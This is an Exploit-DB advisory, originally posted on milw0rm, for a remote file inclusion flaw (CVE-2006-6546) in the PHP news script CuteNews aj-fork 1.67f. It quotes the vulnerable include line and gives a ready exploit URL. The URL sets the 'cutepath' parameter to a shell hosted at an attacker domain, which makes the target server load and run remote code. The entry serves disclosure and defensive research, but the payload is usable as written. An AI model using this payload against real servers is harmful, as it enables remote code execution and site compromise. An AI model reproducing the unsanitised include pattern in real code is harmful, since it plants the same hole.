CuteNews aj-fork 167f - 'cutepath' Remote File Inclusion

Author: DeltahackingTEAM
type: webapps
platform: php
port: 
date_added: 2006-12-03 
date_updated: 2017-01-12 
verified: 1 
codes: OSVDB-32339;CVE-2006-6546 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcn_aj_167.zip

===========================================================================================================
DeltasecurityTEAM
www.Deltasecurity.ir
===========================================================================================================
* Portal Name : cutenews aj-fork

* Class = Remote File Inclusion ;

* Download =http://mesh.dl.sourceforge.net/sourceforge/ajfork/cn_aj_167.zip

* Found by = DeltahackingTEAM

* User In Delta Team (Tanha )

----------------------------------------------------------------------------------------------------------
- Vulnerable Code
--------------------

    include($cutepath.'/inc/plugins.php');

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:
    http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell?

----------------------------------------------------------------------------------------------------------
Sp Tnx For All Admin And All Member EXCEPT DR.TROJAN
Sp Tnx For Dr.Pantagon For Learning Find Bug

# milw0rm.com [2006-12-04]